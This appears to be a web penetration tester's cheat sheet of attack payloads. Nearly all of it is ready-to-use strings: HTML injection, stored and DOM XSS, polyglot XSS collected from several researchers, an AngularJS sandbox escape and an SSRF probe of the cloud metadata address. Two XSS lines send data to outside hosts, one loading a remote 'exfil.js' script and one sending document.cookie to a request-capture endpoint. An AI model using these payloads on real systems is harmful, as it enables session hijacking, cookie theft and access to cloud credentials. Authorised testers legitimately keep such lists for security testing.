
----------------------------------------------------------------------------------------------------------------------------------------------------------------
HTML Injection:
----------------------------------------------------------------------------------------------------------------------------------------------------------------
<u>TestHTML</u>


----------------------------------------------------------------------------------------------------------------------------------------------------------------
Stored XSS
----------------------------------------------------------------------------------------------------------------------------------------------------------------

“><script src=“https://abhilash.pk//exfil.js”></script>

<img src=x onerror=this.src='https://gopal.free.beeceptor.com/?'+document.cookie;>

"><img src=x onerror=alert(101)>

"><img src=x onerror=alert(document.cookie)>

"><<img onerror=alert(document.domain) src>

%5C%22%3E%3C%3Cimg%20onerror%3Dalert%2855%29%20src%3E


Encoded
-----------------------------
&lt;img src=x onerror=alert(1)&gt;

In json fields through burp:
-----------------------------
<img src=x onerror=alert(1)>


Insert Link/url field:
-----------------------------
XSS<iframe></textarea></iframe><iframe srcdoc="<img src onerror=alert(document.domain)>">

XSS<iframe></textarea></iframe><iframe srcdoc="<img src onerror=alert(document.cookie)>">
XSS<iframe></textarea></iframe><iframe%20srcdoc="<img%20src%20onerror=alert(document.cookie)>">

Polyglots
-----------------------------

Polyglot XSS - 0xsobky
-----------------------------
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(12) )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e

Polyglot XSS - Ashar Javed
-----------------------------
 ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

Polyglot XSS - Mathias Karlsson
-----------------------------
" onclick=alert(1)//<button ‘ onclick=alert(document.cookie)//> */ alert(1)//

Polyglot XSS - Rsnake
-----------------------------
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Polyglot XSS - Daniel Miessler
-----------------------------
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*

Portswigger
-----------------------------
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
 onmouseover=/*&lt;svg/*/onload=alert()//>
 
 javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>

DOM XSS
-----------------------------
""</script><script>alert('DOM XXS')</script>
    --> DOM of the page is broken and the script is getting executed.
    
 
 
AngularJS stored XSS vulnerability
---------------------------------
1. Usual payload in product name as '"><img src onerror=alert(1)>x{{7*7}}
2. Output as '">x49
Final payload: {{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(1),a')}}
----------------------------------------------------------------------------------------------------------------------------------------------------------------
SSRF
----------------------------------------------------------------------------------------------------------------------------------------------------------------
http://169.254.169.254/latest/meta-data/


----------------------------------------------------------------------------------------------------------------------------------------------------------------
https://gist.github.com/soaj1664/9588791
----------------------------------------------------------------------------------------------------------------------------------------------------------------

